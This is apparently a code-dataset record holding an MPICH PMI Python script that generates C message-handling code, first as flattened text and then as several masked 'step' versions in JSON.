print("#ifndef %s" % INC, file=Out)
print("#define %s" % INC, file=Out)
print("", file=Out)
dump_enums(Out)
print("", file=Out)
dump_decls(Out)
print("", file=Out)
print("#endif /* %s */" % INC, file=Out)
with open(msg_c, "w") as Out:
dump_copyright(Out)
for inc in ["pmi_config", "mpl", "pmi_util", "pmi_common", "pmi_wire", "pmi_msg"]:
print("#include \"%s.h\"\n" % inc, file=Out)
dump_cmd_to_id(Out)
print("", file=Out)
dump_id_to_str(Out, "query")
print("", file=Out)
dump_id_to_str(Out, "response")
print("", file=Out)
dump_funcs(Out)
#---- utils ------------------------------------
def get_set_params(attrs):
tlist = []
for a in attrs:
if len(a) == 3:
# name, kind, tail
tlist.append(get_kind(a[1]) + get_var(a[0]))
return ', '.join(tlist)
def get_get_params(attrs):
tlist = []
for a in attrs:
if len(a) == 3:
# name, kind, tail
tlist.append(get_kind(a[1]) + '*' + get_var(a[0]))
return ', '.join(tlist)
def get_var(name):
return name.replace("-", "_")
def get_kind(kind):
if kind == "INTEGER":
return "int "
elif kind == "STRING":
return "const char *"
elif kind == "BOOLEAN":
return "bool "
else:
raise Exception("unexpected kind " + kind)
def attrs_identical(attrs_a, attrs_b):
if len(attrs_a) != len(attrs_b):
return False
for i in range(len(attrs_a)):
a = attrs_a[i]
b = attrs_b[i]
if a[0] != b[0] or a[1] != b[1] or a[2] != b[2]:
return False
return True
# ---- dump utils -----------------------------------------
def dump_copyright(out):
print("/*", file=out)
print(" * Copyright (C) by Argonne National Laboratory", file=out)
print(" * See COPYRIGHT in top-level directory", file=out)
print(" */", file=out)
print("", file=out)
print("/* ** This file is auto-generated, do not edit ** */", file=out)
print("", file=out)
def get_include_guard(h_file):
h_file = re.sub(r'.*\/', '', h_file)
h_file = re.sub(r'\.', '_', h_file)
return h_file.upper() + "_INCLUDED"
# ---------------------------------------------------------
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "76382f353c47747ee730d83c2d3990049c4b0d98",
"index": 6795,
"step-1": "<mask token>\n\n\nclass G:\n pmi_vers = []\n cmd_list = []\n cmd_hash = {}\n\n\nclass RE:\n m = None\n\n def match(pat, str, flags=0):\n RE.m = re.match(pat, str, flags)\n return RE.m\n\n def search(pat, str, flags=0):\n RE.m = re.search(pat, str, flags)\n return RE.m\n\n\n<mask token>\n\n\ndef dump_all():\n\n def dump_enums(Out):\n print('enum PMIU_CMD_ID {', file=Out)\n print(' PMIU_CMD_INVALID,', file=Out)\n for NAME in G.cmd_list:\n print(' PMIU_CMD_%s,' % NAME, file=Out)\n print('};', file=Out)\n print('', file=Out)\n\n def dump_decls(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n decls = []\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n params = get_set_params(v0['query-attrs'])\n decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (\n name, std_query, params))\n params = get_get_params(v0['query-attrs'])\n decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (\n name, std_get, params))\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n params = get_set_params(v0['response-attrs'])\n decls.append('int PMIU_msg_set_response_%s(%s, %s);' %\n (name, std_response, params))\n params = get_get_params(v0['response-attrs'])\n decls.append('int PMIU_msg_get_response_%s(%s, %s);' %\n (name, std_get, params))\n if len(decls):\n print('/* PMIU_CMD_%s */' % NAME, file=Out)\n for l in decls:\n print(l, file=Out)\n\n def dump_cmd_to_id(Out):\n print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)\n print('{', file=Out)\n t_if = ' if'\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and 'query-name' in v[NAME]:\n t = v[NAME]['query-name']\n if t not in prev:\n cmp_list.append('strcmp(cmd, \"%s\") == 0' % t)\n prev[t] = 1\n if len(cmp_list):\n print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)\n print(' return PMIU_CMD_%s;' % NAME, file=Out)\n t_if = ' } else if'\n print(' } else {', file=Out)\n print(' return PMIU_CMD_INVALID;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_str(Out, query):\n namekey = query + '-name'\n print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %\n query, file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and namekey in v[NAME]:\n t = v[NAME][namekey]\n if t not in prev:\n cmp_list.append(t)\n prev[t] = 1\n if len(cmp_list) > 0:\n print(' case PMIU_CMD_%s:' % NAME, file=Out)\n if len(cmp_list) == 1:\n print(' return \"%s\";' % cmp_list[0], file=Out)\n else:\n print(\n ' return (version == PMIU_WIRE_V1) ? \"%s\" : \"%s\";'\n % (cmp_list[0], cmp_list[1]), file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_response(Out):\n print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',\n file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_funcs(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n\n def dump_if_version(t_if, version, is_set, is_query):\n if re.match('1\\\\.', version):\n ver = 'PMIU_WIRE_V1'\n else:\n ver = 'PMIU_WIRE_V2'\n if is_set:\n if is_query:\n print(t_if + ' (version == %s) {' % ver, file=Out)\n else:\n print(t_if + ' (pmi_query->version == %s) {' % ver,\n file=Out)\n else:\n print(t_if + ' (pmi->version == %s) {' % ver, file=Out)\n\n def dump_attrs(spaces, is_set, is_query, attrs, attrs0):\n non_optional = 0\n for i in range(len(attrs)):\n a = attrs[i]\n var = get_var(attrs0[i][0])\n if is_query:\n pmi = 'pmi_query'\n else:\n pmi = 'pmi_resp'\n if a[1] == 'INTEGER':\n kind = 'int'\n elif a[1] == 'STRING':\n kind = 'str'\n elif a[1] == 'BOOLEAN':\n kind = 'bool'\n else:\n raise Exception('Unhandled kind: ' + a[1])\n if is_set:\n pmiu = 'PMIU_cmd_add_' + kind\n print(spaces + '%s(%s, \"%s\", %s);' % (pmiu, pmi, a[0],\n var), file=Out)\n elif RE.match('.*optional=(\\\\S+)', a[2]):\n dflt = RE.m.group(1)\n pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s, %s);' % (pmiu, a[0],\n var, dflt), file=Out)\n else:\n pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s);' % (pmiu, a[0], var\n ), file=Out)\n non_optional += 1\n return non_optional\n\n def dump_it(NAME, v_list, is_set, is_query, attrs):\n print('', file=Out)\n ret_errno = True\n if is_set:\n params = get_set_params(attrs)\n if is_query:\n ret_errno = False\n print('void PMIU_msg_set_query_%s(%s, %s)' % (name,\n std_query, params), file=Out)\n else:\n print('int PMIU_msg_set_response_%s(%s, %s)' % (name,\n std_response, params), file=Out)\n else:\n params = get_get_params(attrs)\n if is_query:\n print('int PMIU_msg_get_query_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n else:\n print('int PMIU_msg_get_response_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n print('{', file=Out)\n if ret_errno:\n print(' int pmi_errno = PMIU_SUCCESS;', file=Out)\n print('', file=Out)\n if is_set:\n if is_query:\n print(\n ' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'\n % NAME, file=Out)\n else:\n print(\n ' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %\n NAME, file=Out)\n print(\n ' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'\n , file=Out)\n attrs_b = None\n if len(v_list) > 1:\n if is_query:\n attrs_b = v_list[1]['query-attrs']\n else:\n attrs_b = v_list[1]['response-attrs']\n non_optional = 0\n if attrs_b is None or attrs_identical(attrs, attrs_b):\n non_optional += dump_attrs(' ', is_set, is_query, attrs,\n attrs)\n else:\n dump_if_version(' if', v_list[0]['version'], is_set,\n is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs, attrs)\n dump_if_version(' } else if', v_list[1]['version'],\n is_set, is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs_b, attrs)\n if ret_errno:\n print(' } else {', file=Out)\n print(\n ' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \"invalid version\");'\n , file=Out)\n non_optional += 1\n print(' }', file=Out)\n if non_optional > 0:\n print('', file=Out)\n print(' fn_exit:', file=Out)\n print(' return pmi_errno;', file=Out)\n print(' fn_fail:', file=Out)\n print(' goto fn_exit;', file=Out)\n elif ret_errno:\n print('', file=Out)\n print(' return pmi_errno;', file=Out)\n print('}', file=Out)\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n dump_it(NAME, v_list, True, True, v0['query-attrs'])\n dump_it(NAME, v_list, False, True, v0['query-attrs'])\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n dump_it(NAME, v_list, True, False, v0['response-attrs'])\n dump_it(NAME, v_list, False, False, v0['response-attrs'])\n msg_h = 'src/pmi_msg.h'\n msg_c = 'src/pmi_msg.c'\n with open(msg_h, 'w') as Out:\n dump_copyright(Out)\n INC = get_include_guard(msg_h)\n print('#ifndef %s' % INC, file=Out)\n print('#define %s' % INC, file=Out)\n print('', file=Out)\n dump_enums(Out)\n print('', file=Out)\n dump_decls(Out)\n print('', file=Out)\n print('#endif /* %s */' % INC, file=Out)\n with open(msg_c, 'w') as Out:\n dump_copyright(Out)\n for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',\n 'pmi_wire', 'pmi_msg']:\n print('#include \"%s.h\"\\n' % inc, file=Out)\n dump_cmd_to_id(Out)\n print('', file=Out)\n dump_id_to_str(Out, 'query')\n print('', file=Out)\n dump_id_to_str(Out, 'response')\n print('', file=Out)\n dump_funcs(Out)\n\n\n<mask token>\n\n\ndef get_var(name):\n return name.replace('-', '_')\n\n\ndef get_kind(kind):\n if kind == 'INTEGER':\n return 'int '\n elif kind == 'STRING':\n return 'const char *'\n elif kind == 'BOOLEAN':\n return 'bool '\n else:\n raise Exception('unexpected kind ' + kind)\n\n\n<mask token>\n\n\ndef get_include_guard(h_file):\n h_file = re.sub('.*\\\\/', '', h_file)\n h_file = re.sub('\\\\.', '_', h_file)\n return h_file.upper() + '_INCLUDED'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass G:\n pmi_vers = []\n cmd_list = []\n cmd_hash = {}\n\n\nclass RE:\n m = None\n\n def match(pat, str, flags=0):\n RE.m = re.match(pat, str, flags)\n return RE.m\n\n def search(pat, str, flags=0):\n RE.m = re.search(pat, str, flags)\n return RE.m\n\n\ndef main():\n load_pmi_txt('maint/pmi-1.1.txt', '1.1')\n load_pmi_txt('maint/pmi-2.0.txt', '2.0')\n dump_all()\n\n\n<mask token>\n\n\ndef dump_all():\n\n def dump_enums(Out):\n print('enum PMIU_CMD_ID {', file=Out)\n print(' PMIU_CMD_INVALID,', file=Out)\n for NAME in G.cmd_list:\n print(' PMIU_CMD_%s,' % NAME, file=Out)\n print('};', file=Out)\n print('', file=Out)\n\n def dump_decls(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n decls = []\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n params = get_set_params(v0['query-attrs'])\n decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (\n name, std_query, params))\n params = get_get_params(v0['query-attrs'])\n decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (\n name, std_get, params))\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n params = get_set_params(v0['response-attrs'])\n decls.append('int PMIU_msg_set_response_%s(%s, %s);' %\n (name, std_response, params))\n params = get_get_params(v0['response-attrs'])\n decls.append('int PMIU_msg_get_response_%s(%s, %s);' %\n (name, std_get, params))\n if len(decls):\n print('/* PMIU_CMD_%s */' % NAME, file=Out)\n for l in decls:\n print(l, file=Out)\n\n def dump_cmd_to_id(Out):\n print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)\n print('{', file=Out)\n t_if = ' if'\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and 'query-name' in v[NAME]:\n t = v[NAME]['query-name']\n if t not in prev:\n cmp_list.append('strcmp(cmd, \"%s\") == 0' % t)\n prev[t] = 1\n if len(cmp_list):\n print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)\n print(' return PMIU_CMD_%s;' % NAME, file=Out)\n t_if = ' } else if'\n print(' } else {', file=Out)\n print(' return PMIU_CMD_INVALID;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_str(Out, query):\n namekey = query + '-name'\n print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %\n query, file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and namekey in v[NAME]:\n t = v[NAME][namekey]\n if t not in prev:\n cmp_list.append(t)\n prev[t] = 1\n if len(cmp_list) > 0:\n print(' case PMIU_CMD_%s:' % NAME, file=Out)\n if len(cmp_list) == 1:\n print(' return \"%s\";' % cmp_list[0], file=Out)\n else:\n print(\n ' return (version == PMIU_WIRE_V1) ? \"%s\" : \"%s\";'\n % (cmp_list[0], cmp_list[1]), file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_response(Out):\n print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',\n file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_funcs(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n\n def dump_if_version(t_if, version, is_set, is_query):\n if re.match('1\\\\.', version):\n ver = 'PMIU_WIRE_V1'\n else:\n ver = 'PMIU_WIRE_V2'\n if is_set:\n if is_query:\n print(t_if + ' (version == %s) {' % ver, file=Out)\n else:\n print(t_if + ' (pmi_query->version == %s) {' % ver,\n file=Out)\n else:\n print(t_if + ' (pmi->version == %s) {' % ver, file=Out)\n\n def dump_attrs(spaces, is_set, is_query, attrs, attrs0):\n non_optional = 0\n for i in range(len(attrs)):\n a = attrs[i]\n var = get_var(attrs0[i][0])\n if is_query:\n pmi = 'pmi_query'\n else:\n pmi = 'pmi_resp'\n if a[1] == 'INTEGER':\n kind = 'int'\n elif a[1] == 'STRING':\n kind = 'str'\n elif a[1] == 'BOOLEAN':\n kind = 'bool'\n else:\n raise Exception('Unhandled kind: ' + a[1])\n if is_set:\n pmiu = 'PMIU_cmd_add_' + kind\n print(spaces + '%s(%s, \"%s\", %s);' % (pmiu, pmi, a[0],\n var), file=Out)\n elif RE.match('.*optional=(\\\\S+)', a[2]):\n dflt = RE.m.group(1)\n pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s, %s);' % (pmiu, a[0],\n var, dflt), file=Out)\n else:\n pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s);' % (pmiu, a[0], var\n ), file=Out)\n non_optional += 1\n return non_optional\n\n def dump_it(NAME, v_list, is_set, is_query, attrs):\n print('', file=Out)\n ret_errno = True\n if is_set:\n params = get_set_params(attrs)\n if is_query:\n ret_errno = False\n print('void PMIU_msg_set_query_%s(%s, %s)' % (name,\n std_query, params), file=Out)\n else:\n print('int PMIU_msg_set_response_%s(%s, %s)' % (name,\n std_response, params), file=Out)\n else:\n params = get_get_params(attrs)\n if is_query:\n print('int PMIU_msg_get_query_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n else:\n print('int PMIU_msg_get_response_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n print('{', file=Out)\n if ret_errno:\n print(' int pmi_errno = PMIU_SUCCESS;', file=Out)\n print('', file=Out)\n if is_set:\n if is_query:\n print(\n ' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'\n % NAME, file=Out)\n else:\n print(\n ' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %\n NAME, file=Out)\n print(\n ' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'\n , file=Out)\n attrs_b = None\n if len(v_list) > 1:\n if is_query:\n attrs_b = v_list[1]['query-attrs']\n else:\n attrs_b = v_list[1]['response-attrs']\n non_optional = 0\n if attrs_b is None or attrs_identical(attrs, attrs_b):\n non_optional += dump_attrs(' ', is_set, is_query, attrs,\n attrs)\n else:\n dump_if_version(' if', v_list[0]['version'], is_set,\n is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs, attrs)\n dump_if_version(' } else if', v_list[1]['version'],\n is_set, is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs_b, attrs)\n if ret_errno:\n print(' } else {', file=Out)\n print(\n ' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \"invalid version\");'\n , file=Out)\n non_optional += 1\n print(' }', file=Out)\n if non_optional > 0:\n print('', file=Out)\n print(' fn_exit:', file=Out)\n print(' return pmi_errno;', file=Out)\n print(' fn_fail:', file=Out)\n print(' goto fn_exit;', file=Out)\n elif ret_errno:\n print('', file=Out)\n print(' return pmi_errno;', file=Out)\n print('}', file=Out)\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n dump_it(NAME, v_list, True, True, v0['query-attrs'])\n dump_it(NAME, v_list, False, True, v0['query-attrs'])\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n dump_it(NAME, v_list, True, False, v0['response-attrs'])\n dump_it(NAME, v_list, False, False, v0['response-attrs'])\n msg_h = 'src/pmi_msg.h'\n msg_c = 'src/pmi_msg.c'\n with open(msg_h, 'w') as Out:\n dump_copyright(Out)\n INC = get_include_guard(msg_h)\n print('#ifndef %s' % INC, file=Out)\n print('#define %s' % INC, file=Out)\n print('', file=Out)\n dump_enums(Out)\n print('', file=Out)\n dump_decls(Out)\n print('', file=Out)\n print('#endif /* %s */' % INC, file=Out)\n with open(msg_c, 'w') as Out:\n dump_copyright(Out)\n for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',\n 'pmi_wire', 'pmi_msg']:\n print('#include \"%s.h\"\\n' % inc, file=Out)\n dump_cmd_to_id(Out)\n print('', file=Out)\n dump_id_to_str(Out, 'query')\n print('', file=Out)\n dump_id_to_str(Out, 'response')\n print('', file=Out)\n dump_funcs(Out)\n\n\ndef get_set_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n tlist.append(get_kind(a[1]) + get_var(a[0]))\n return ', '.join(tlist)\n\n\n<mask token>\n\n\ndef get_var(name):\n return name.replace('-', '_')\n\n\ndef get_kind(kind):\n if kind == 'INTEGER':\n return 'int '\n elif kind == 'STRING':\n return 'const char *'\n elif kind == 'BOOLEAN':\n return 'bool '\n else:\n raise Exception('unexpected kind ' + kind)\n\n\n<mask token>\n\n\ndef dump_copyright(out):\n print('/*', file=out)\n print(' * Copyright (C) by Argonne National Laboratory', file=out)\n print(' * See COPYRIGHT in top-level directory', file=out)\n print(' */', file=out)\n print('', file=out)\n print('/* ** This file is auto-generated, do not edit ** */', file=out)\n print('', file=out)\n\n\ndef get_include_guard(h_file):\n h_file = re.sub('.*\\\\/', '', h_file)\n h_file = re.sub('\\\\.', '_', h_file)\n return h_file.upper() + '_INCLUDED'\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass G:\n pmi_vers = []\n cmd_list = []\n cmd_hash = {}\n\n\nclass RE:\n m = None\n\n def match(pat, str, flags=0):\n RE.m = re.match(pat, str, flags)\n return RE.m\n\n def search(pat, str, flags=0):\n RE.m = re.search(pat, str, flags)\n return RE.m\n\n\ndef main():\n load_pmi_txt('maint/pmi-1.1.txt', '1.1')\n load_pmi_txt('maint/pmi-2.0.txt', '2.0')\n dump_all()\n\n\ndef load_pmi_txt(pmi_txt, ver):\n cur_hash = {'version': ver}\n G.pmi_vers.append(cur_hash)\n prev_cmd = None\n cur_cmd = None\n cur_attrs = None\n with open(pmi_txt, 'r') as In:\n for line in In:\n if RE.match('([A-Z]+):', line):\n name = RE.m.group(1)\n cur_cmd = {'version': ver}\n cur_hash[name] = cur_cmd\n if name not in G.cmd_hash:\n G.cmd_list.append(name)\n G.cmd_hash[name] = cur_cmd\n prev_cmd = None\n else:\n prev_cmd = G.cmd_hash[name]\n elif RE.match('\\\\s+([QR]):\\\\s*([\\\\w-]+)(.*)', line):\n QR, cmd, tail = RE.m.group(1, 2, 3)\n cur_attrs = []\n if QR == 'Q':\n cur_cmd['query-name'] = cmd\n if RE.match('.*wire=.+', tail):\n cur_cmd['query-attrs'] = []\n else:\n cur_cmd['query-attrs'] = cur_attrs\n else:\n cur_cmd['response-name'] = cmd\n cur_cmd['response-attrs'] = cur_attrs\n elif RE.match('\\\\s+([\\\\w-]+):\\\\s*([A-Z]+)(.*)', line):\n name, kind, tail = RE.m.group(1, 2, 3)\n cur_attrs.append([name, kind, tail])\n elif RE.match('\\\\s+([\\\\[\\\\]])', line):\n cur_attrs.append(RE.m.group(1))\n\n\ndef dump_all():\n\n def dump_enums(Out):\n print('enum PMIU_CMD_ID {', file=Out)\n print(' PMIU_CMD_INVALID,', file=Out)\n for NAME in G.cmd_list:\n print(' PMIU_CMD_%s,' % NAME, file=Out)\n print('};', file=Out)\n print('', file=Out)\n\n def dump_decls(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n decls = []\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n params = get_set_params(v0['query-attrs'])\n decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (\n name, std_query, params))\n params = get_get_params(v0['query-attrs'])\n decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (\n name, std_get, params))\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n params = get_set_params(v0['response-attrs'])\n decls.append('int PMIU_msg_set_response_%s(%s, %s);' %\n (name, std_response, params))\n params = get_get_params(v0['response-attrs'])\n decls.append('int PMIU_msg_get_response_%s(%s, %s);' %\n (name, std_get, params))\n if len(decls):\n print('/* PMIU_CMD_%s */' % NAME, file=Out)\n for l in decls:\n print(l, file=Out)\n\n def dump_cmd_to_id(Out):\n print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)\n print('{', file=Out)\n t_if = ' if'\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and 'query-name' in v[NAME]:\n t = v[NAME]['query-name']\n if t not in prev:\n cmp_list.append('strcmp(cmd, \"%s\") == 0' % t)\n prev[t] = 1\n if len(cmp_list):\n print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)\n print(' return PMIU_CMD_%s;' % NAME, file=Out)\n t_if = ' } else if'\n print(' } else {', file=Out)\n print(' return PMIU_CMD_INVALID;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_str(Out, query):\n namekey = query + '-name'\n print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %\n query, file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and namekey in v[NAME]:\n t = v[NAME][namekey]\n if t not in prev:\n cmp_list.append(t)\n prev[t] = 1\n if len(cmp_list) > 0:\n print(' case PMIU_CMD_%s:' % NAME, file=Out)\n if len(cmp_list) == 1:\n print(' return \"%s\";' % cmp_list[0], file=Out)\n else:\n print(\n ' return (version == PMIU_WIRE_V1) ? \"%s\" : \"%s\";'\n % (cmp_list[0], cmp_list[1]), file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_response(Out):\n print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',\n file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_funcs(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n\n def dump_if_version(t_if, version, is_set, is_query):\n if re.match('1\\\\.', version):\n ver = 'PMIU_WIRE_V1'\n else:\n ver = 'PMIU_WIRE_V2'\n if is_set:\n if is_query:\n print(t_if + ' (version == %s) {' % ver, file=Out)\n else:\n print(t_if + ' (pmi_query->version == %s) {' % ver,\n file=Out)\n else:\n print(t_if + ' (pmi->version == %s) {' % ver, file=Out)\n\n def dump_attrs(spaces, is_set, is_query, attrs, attrs0):\n non_optional = 0\n for i in range(len(attrs)):\n a = attrs[i]\n var = get_var(attrs0[i][0])\n if is_query:\n pmi = 'pmi_query'\n else:\n pmi = 'pmi_resp'\n if a[1] == 'INTEGER':\n kind = 'int'\n elif a[1] == 'STRING':\n kind = 'str'\n elif a[1] == 'BOOLEAN':\n kind = 'bool'\n else:\n raise Exception('Unhandled kind: ' + a[1])\n if is_set:\n pmiu = 'PMIU_cmd_add_' + kind\n print(spaces + '%s(%s, \"%s\", %s);' % (pmiu, pmi, a[0],\n var), file=Out)\n elif RE.match('.*optional=(\\\\S+)', a[2]):\n dflt = RE.m.group(1)\n pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s, %s);' % (pmiu, a[0],\n var, dflt), file=Out)\n else:\n pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s);' % (pmiu, a[0], var\n ), file=Out)\n non_optional += 1\n return non_optional\n\n def dump_it(NAME, v_list, is_set, is_query, attrs):\n print('', file=Out)\n ret_errno = True\n if is_set:\n params = get_set_params(attrs)\n if is_query:\n ret_errno = False\n print('void PMIU_msg_set_query_%s(%s, %s)' % (name,\n std_query, params), file=Out)\n else:\n print('int PMIU_msg_set_response_%s(%s, %s)' % (name,\n std_response, params), file=Out)\n else:\n params = get_get_params(attrs)\n if is_query:\n print('int PMIU_msg_get_query_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n else:\n print('int PMIU_msg_get_response_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n print('{', file=Out)\n if ret_errno:\n print(' int pmi_errno = PMIU_SUCCESS;', file=Out)\n print('', file=Out)\n if is_set:\n if is_query:\n print(\n ' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'\n % NAME, file=Out)\n else:\n print(\n ' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %\n NAME, file=Out)\n print(\n ' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'\n , file=Out)\n attrs_b = None\n if len(v_list) > 1:\n if is_query:\n attrs_b = v_list[1]['query-attrs']\n else:\n attrs_b = v_list[1]['response-attrs']\n non_optional = 0\n if attrs_b is None or attrs_identical(attrs, attrs_b):\n non_optional += dump_attrs(' ', is_set, is_query, attrs,\n attrs)\n else:\n dump_if_version(' if', v_list[0]['version'], is_set,\n is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs, attrs)\n dump_if_version(' } else if', v_list[1]['version'],\n is_set, is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs_b, attrs)\n if ret_errno:\n print(' } else {', file=Out)\n print(\n ' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \"invalid version\");'\n , file=Out)\n non_optional += 1\n print(' }', file=Out)\n if non_optional > 0:\n print('', file=Out)\n print(' fn_exit:', 